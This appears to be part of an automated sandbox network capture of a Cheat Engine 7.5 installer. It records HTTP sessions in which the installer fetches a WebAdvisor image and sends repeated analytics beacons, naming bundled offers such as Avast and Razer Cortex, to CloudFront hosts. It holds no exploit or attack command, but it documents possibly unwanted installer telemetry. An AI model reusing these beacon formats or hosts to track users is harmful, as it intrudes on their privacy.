65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:20:14 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:14 GMT Via: 1.1 9b3a0b2647b64bb06aa470977314bbb2.cloudfront.net (CloudFront), 1.1 16f88a640328f5c5351c2916207f0148.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: 2ocPW7IPygy_0G5jJdY6a-m7qfRCU_DGNLAx4b70yVE-uekRqlYcdg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:16 UTC	139	OUT	GET /f/WebAdvisor/images/943/EN.png HTTP/1.1 Connection: Keep-Alive User-Agent: Inno Setup 6.2.2 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:17 UTC	511	IN	HTTP/1.1 200 OK Content-Type: image/png Content-Length: 48743 Connection: close Last-Modified: Wed, 23 Nov 2022 15:50:00 GMT x-amz-version-id: RW9gnZViDqHn6sjOaRWUaFg5F2z0vnXM Accept-Ranges: bytes Server: AmazonS3 Date: Sat, 28 Dec 2024 05:40:34 GMT ETag: "4cfff8dc30d353cd3d215fd3a5dbac24" X-Cache: Hit from cloudfront Via: 1.1 90cdff7228f895ed6ae34a9448571062.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: HU6luPJp4QQTNw0bRmmmCvh2nLQ08Ba9KErRYxRuhpWPsnJXA0sHAQ== Age: 56384
2024-12-28 21:20:17 UTC	15873	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 68 08 06 00 00 00 b5 fd 28 e7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 bd fc 49 44 41 54 78 01 ec bd bf b3 65 49 75 e7 bb ab 1b 01 c6 28 d4 0a 59 33 31 11 7d 71 c0 19 05 8d 60 14 a1 e7 74 e1 cf 04 8d 5a 83 c4 38 74 3b 78 33 c0 5f 40 e1 8c 33 06 30 de 7b 0e 45 84 22 80 26 1a 35 a1 67 8d 43 e1 bc 89 90 40 0d 92 25 9c 3e 72 84 35 a1 ea d0 18 42 02 ea ed 4f d5 fe dc 5e b5 2a f7 af 73 f6 b9 f7 dc 7b d6 37 e2 dc 7b ce fe 91 b9 72 e5 ca 95 2b 57 ae cc ec ba 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 Data Ascii: PNGIHDRh(pHYssRGBgAMAaIDATxeIu(Y31}q`tZ8t;x3_@30{E"&5gC@%>r5BO^*s{7{r+WBP(BP(BP(BP(BP(BP(
2024-12-28 21:20:17 UTC	16384	IN	Data Raw: e5 b4 e6 16 92 b4 8c 80 d8 f1 e5 fb 63 9e 0f 01 8f e9 d8 9c 5e 73 fa 75 29 ec 14 63 bd da 19 c7 74 5a 3c cb a1 16 91 87 ca 64 2c 07 65 6d 19 29 76 c2 7c 48 93 fc a1 6b ac ec 1a dc c8 87 cf 45 23 8c 8e 3a cb 5a 4c 6b 69 27 63 fb c9 bc 01 f2 2d 03 79 81 ae d8 a1 6a 28 90 5e 2e 53 34 fa f7 81 5e 2d f8 e6 94 aa bc 5e 8a 39 19 cb 60 80 ea c0 15 dd c2 fb 71 c0 81 6e 59 13 13 9b 65 2b fe d6 78 6e d1 7b cc dd 4f d6 e8 ea ae 7b 96 87 7a fb e1 11 f7 b2 2e 54 26 40 1e 9c 0a 8d b6 25 98 d2 69 f0 69 ad 1e 85 3e 0d 4b fb 14 bd cb ad f4 cc 7f 4d 9d 2c 91 bb 9c 8f b3 94 51 8f c4 74 f4 f0 46 d8 c6 90 d5 56 5f 89 47 dc 81 7f ec 2b 91 61 de a5 5e d4 ff 3a 3f c6 10 eb 21 3e 87 f1 dc ba bf b4 7e 6f 3a ca e0 2d 4c 02 43 57 af 99 1e c9 a9 4e 44 cf 92 06 80 9d 1e 0d 98 eb 2a d8 Data Ascii: c^su)ctZ<d,em)v\|HkE#:ZLki'c-yj(^.S4^-^9`qnYe+xn{O{z.T&@%ii>KM,QtFV_G+a^:?!>~o:-LCWND*
2024-12-28 21:20:17 UTC	15713	IN	Data Raw: 1d 82 7d 0c eb b9 e7 0f e1 e9 75 1a ba 62 2b fe ef 93 ce 3e fa 65 8e 67 6b d2 5c ab 77 e6 16 ab 1d 53 4f 8c e1 3a f5 a2 70 4a 1f 6f e5 58 18 db d2 3c d6 d4 df b1 db cf 12 79 5b 43 c3 92 67 b7 e6 51 4c 77 2a ed 2d db d5 29 a3 42 1a 0a 37 02 4c 0d 3b 05 35 16 2b 75 13 91 3d 22 37 01 73 75 e1 74 59 e1 76 e3 1c ea d9 45 3b 79 ea fb 54 10 db e2 92 81 f3 31 40 be 86 88 5d cc 84 57 15 0a d7 89 0a 69 58 80 db 1a d2 70 d3 b0 66 fa a8 70 5c 54 5d 14 ce 05 a7 2e eb a7 40 5f e9 83 c2 16 38 76 48 43 79 78 0b 37 06 a5 50 4f 07 55 17 85 73 c1 a9 cb fa 29 d0 57 fa a0 70 13 50 06 6f a1 50 28 14 0a 85 42 e1 56 a3 0c de 33 82 db 93 1c e3 80 84 eb 86 47 42 02 b6 66 6a 1d 45 7a 9d 60 27 86 b1 0d bb 59 f4 41 bd 1c 02 ca 3c b5 9f ef 75 83 ed 8e d6 d6 c9 3e fb 1a 1f 0b 5b b4 9d Data Ascii: }ub+>egk\wSO:pJoX<y[CgQLw*-)B7L;5+u="7sutYvE;yT1@]WiXpfp\T].@_8vHCyx7POUs)WpPoP(BV3GBfjEz`'YA<u>[
2024-12-28 21:20:17 UTC	773	IN	Data Raw: bc 3f 31 d7 ee a1 49 af e3 5a f3 0e d7 82 9e 98 de 1c c6 87 4e 67 4b 7f 8d 4d a9 38 65 39 65 c1 4f b5 85 1e 71 7a d0 f6 82 6b f0 be b5 6c 1c f3 c3 50 f8 b1 32 1c b3 eb 18 9b 97 da b9 14 7a 25 99 82 53 47 5d 32 2f f5 f6 6e 33 8d 61 b6 c8 f3 92 fc 32 07 9c 39 d1 7f 5d e9 a0 9b f4 58 6f e9 6f 11 d9 0e 46 58 f6 9d 09 2c b2 f8 7a b7 01 ce e1 95 49 1e 9b d0 0d a7 6a d8 96 a6 b3 a5 bf c6 6c 39 65 39 31 84 4d 7a 88 5b fe 66 ee f5 98 d8 85 b5 6c 5c 5a 26 53 e1 c7 ec 3a c6 e6 ad eb 28 02 f3 be 91 b8 9b 1a 90 69 17 73 4e 41 db 22 cf 73 f2 8b 20 67 8a 47 a6 2c ad c5 29 1e 7e 45 e4 7c 51 f0 8a c8 62 58 24 c5 bc c9 6c 11 15 f1 fb 50 bb 7c 5c 2b 08 db 88 5c 7a 37 29 87 a9 5e f6 87 04 81 9e 05 a8 75 61 9c 88 c8 d6 38 a5 e1 f1 f2 68 a6 34 88 8c 11 a1 25 0f cb b9 94 83 f5 Data Ascii: ?1IZNgKM8e9eOqzklP2z%SG]2/n3a29]XooFX,zIjl9e91Mz[fl\Z&S:(isNA"s gG,)~E\|QbX$lP\|\+\z7)^ua8h4%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:19 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 409 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:19 UTC	409	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 63 6f 6d 70 61 6e 69 6f 6e 32 30 31 36 46 46 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 65 62 63 6f 6d 70 61 6e 69 6f 6e 46 46 5f 6e 65 77 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Webcompanion2016FF\",\"18\":\"ZB_WebcompanionFF_new\",\"19\":\"pac_241007\",\"21\":\"17
2024-12-28 21:20:20 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:20:20 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 e287a2eedc3ea7a96ca60cf17cda7732.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: NSkTysHyNulwTGDTa4bL-H-yGnKluUsiKb0DlabUCuZML0_WPhjL4g==
2024-12-28 21:20:20 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49720	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:22 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 464 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:22 UTC	464	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:20:23 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:23 GMT Via: 1.1 f8637e7723c8fa39b50b55af99dbeff2.cloudfront.net (CloudFront), 1.1 5314ccfb7ed3e1df568a8f1ffab668b4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: ooujTBMn_udJT3m4OS1tq6V-d5PtAoPLWMe7QNL3f-MmBZIJrVhZmA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49726	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:26 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 388 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:26 UTC	388	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 41 76 61 73 74 5f 4e 43 48 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 41 76 61 73 74 5f 4e 43 48 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c 5c 22 36 5c 22 3a 5c 22 32 Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Avast_NCH\",\"18\":\"ZB_Avast_NCH\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",\"6\":\"2
2024-12-28 21:20:27 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:20:27 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 5cb640bbbaa55dec4a9f2ef093c54cf4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: CfmIPuzIwfHlhWDTS5ihUhhxWtThC6N4sVz5jFY1mjZLOXATZRpeUQ==
2024-12-28 21:20:27 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49737	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:28 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 443 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:28 UTC	443	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:20:30 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:29 GMT Via: 1.1 0e7c1faba1392f39c179bd78da48eb4e.cloudfront.net (CloudFront), 1.1 2d4a1087f3ef25ab8e6dac5fe05a063e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: FWGwaSoo851uvYTYbGgjan5vA6c8D03ttGnH4mCBxerzLC3tD09aIg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49743	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:32 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 419 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:32 UTC	419	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 52 61 7a 65 72 5f 43 6f 72 74 65 78 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 52 61 7a 65 72 5f 43 6f 72 74 65 78 5f 76 31 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 2c Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Razer_Cortex\",\"18\":\"ZB_Razer_Cortex_v1\",\"19\":\"pac_241007\",\"21\":\"1707gdip\",
2024-12-28 21:20:33 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:20:32 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 3440b79c112e9514e3e6f25a7439db3c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: ZmOKqKg_zBtXffnaqc41OxLIhodY7_XA1gdPdmvdfKpLlne-G8MOjQ==
2024-12-28 21:20:33 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49749	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:34 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 474 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:34 UTC	474	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
2024-12-28 21:20:36 UTC	395	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Vary: Origin Date: Sat, 28 Dec 2024 21:20:35 GMT Via: 1.1 00ea1e24e0d1a38e8abfc94f7cd21846.cloudfront.net (CloudFront), 1.1 759e09affff41285e9585e1a31532bd4.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C1 X-Cache: Miss from cloudfront X-Amz-Cf-Pop: TLV50-C1 X-Amz-Cf-Id: Hvqt8b_4ZXjbUmwGQjT5mTno25s4BoNPJvxlP4sElzzfE6dXqkAJQA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49759	65.9.108.148	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:38 UTC	311	OUT	POST /zbd HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 401 Host: d34hwk9wxgk5fi.cloudfront.net
2024-12-28 21:20:38 UTC	401	OUT	Data Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 43 6f 6d 70 61 6e 69 6f 6e 43 48 4f 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 43 43 48 4f 5f 6e 65 77 5f 49 53 56 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37 30 37 67 64 69 70 5c 22 Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"WebCompanionCHO\",\"18\":\"ZB_WCCHO_new_ISV\",\"19\":\"pac_241007\",\"21\":\"1707gdip\"
2024-12-28 21:20:39 UTC	427	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 15 Connection: close Date: Sat, 28 Dec 2024 21:20:38 GMT Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE Access-Control-Allow-Origin: * X-Cache: Miss from cloudfront Via: 1.1 c71f0b857dc0e27dad67e2b7cd440f10.cloudfront.net (CloudFront) X-Amz-Cf-Pop: TLV50-C2 X-Amz-Cf-Id: CnFuWT9EUFVBwVTAWqvGhCNV63SN6DWJBO_LFhohlC0lokjIXok46g==
2024-12-28 21:20:39 UTC	15	IN	Data Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d Data Ascii: {"Status":"OK"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49766	13.226.4.166	443	6476	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp

Timestamp	Bytes transferred	Direction	Data
2024-12-28 21:20:40 UTC	308	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 456 Host: d31tu1fsc224h4.cloudfront.net
2024-12-28 21:20:40 UTC	456	OUT	Data Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
